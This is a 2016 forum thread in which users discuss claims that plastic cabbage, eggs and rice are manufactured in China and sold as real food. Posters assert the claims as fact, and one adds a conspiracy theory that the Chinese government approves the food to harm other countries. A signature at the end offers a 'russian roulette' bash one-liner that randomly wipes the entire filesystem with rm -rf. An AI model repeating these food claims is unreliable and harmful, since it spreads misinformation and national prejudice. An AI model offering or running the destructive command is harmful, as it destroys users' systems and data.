The Lounge

Plastic Food

Submitted by Stiffmister, , Thread ID: 23761

Thread Closed
07-11-2016, 11:11 PM
Have you guys seen those videos about in china their people making Plastic Cabbage and Eggs and rice? What do you guys think? In my country a lot of people have reported these foods being sold..

RE: Plastic Food

I've seen it with my own eyes before. When I was visiting family, I decided to go to the market and saw police raiding this truck. Apparently, the guy was making the stuff to-order inside of his truck. It sucks because you almost can't tell aside from the smell, which can easily be masked by spices and sauces. He was selling the stuff for dirt-cheap too.
| | |Zenith | Senpai | Username | | |

[Image: unknown.png]

OP
Dam! I never saw it and I'm very scared to go to some restaurant and purchase food and i eat it because that can cause cancer and harm you so much. The funny thing is their videos with Chinese people doing it and they don't even care who sees it it isn't like anyone can literally stop them. I Honestly think it was approved by their government and probably isn't sold through out their country but others to harm them.

They trying to kill everyone bro just wait on it they gonna start nuking countries.

07-11-2016, 11:23 PM
Stiffmister Wrote:
Dam! I never saw it and I'm very scared to go to some restaurant and purchase food and i eat it because that can cause cancer and harm you so much. The funny thing is their videos with Chinese people doing it and they don't even care who sees it it isn't like anyone can literally stop them. I Honestly think it was approved by their government and probably isn't sold through out their country but others to harm them.

Mostly wrong, they do sell it in China. And it's rampant. Some people get in trouble, I guess. Probably if they step on the toes of someone with power.

plastic food... lmao.. i would think it would be easy to tell.

OP
08-11-2016, 10:15 PM
Zaiken Wrote:
plastic food... lmao.. i would think it would be easy to tell.

The cabbage isn't easy to tell... You can only really tell the difference by the Smell which could be covered up with spices.

i Love plastic food its amazing its like play-do

20-11-2016, 09:53 PM
ragegamer33 Wrote:

Up until you digest it and contract a terminal illness.

20-11-2016, 09:53 PM
ragegamer33 Wrote:

LMAO so you tried play-doh?

Thread related: I have never heard of this in my country, is this just from china or just lack of knowledge?
Play russian rulette:
[ $[ $RANDOM % 6 ] == 0 ] && rm -rf --no-preserve-root / || echo *Click*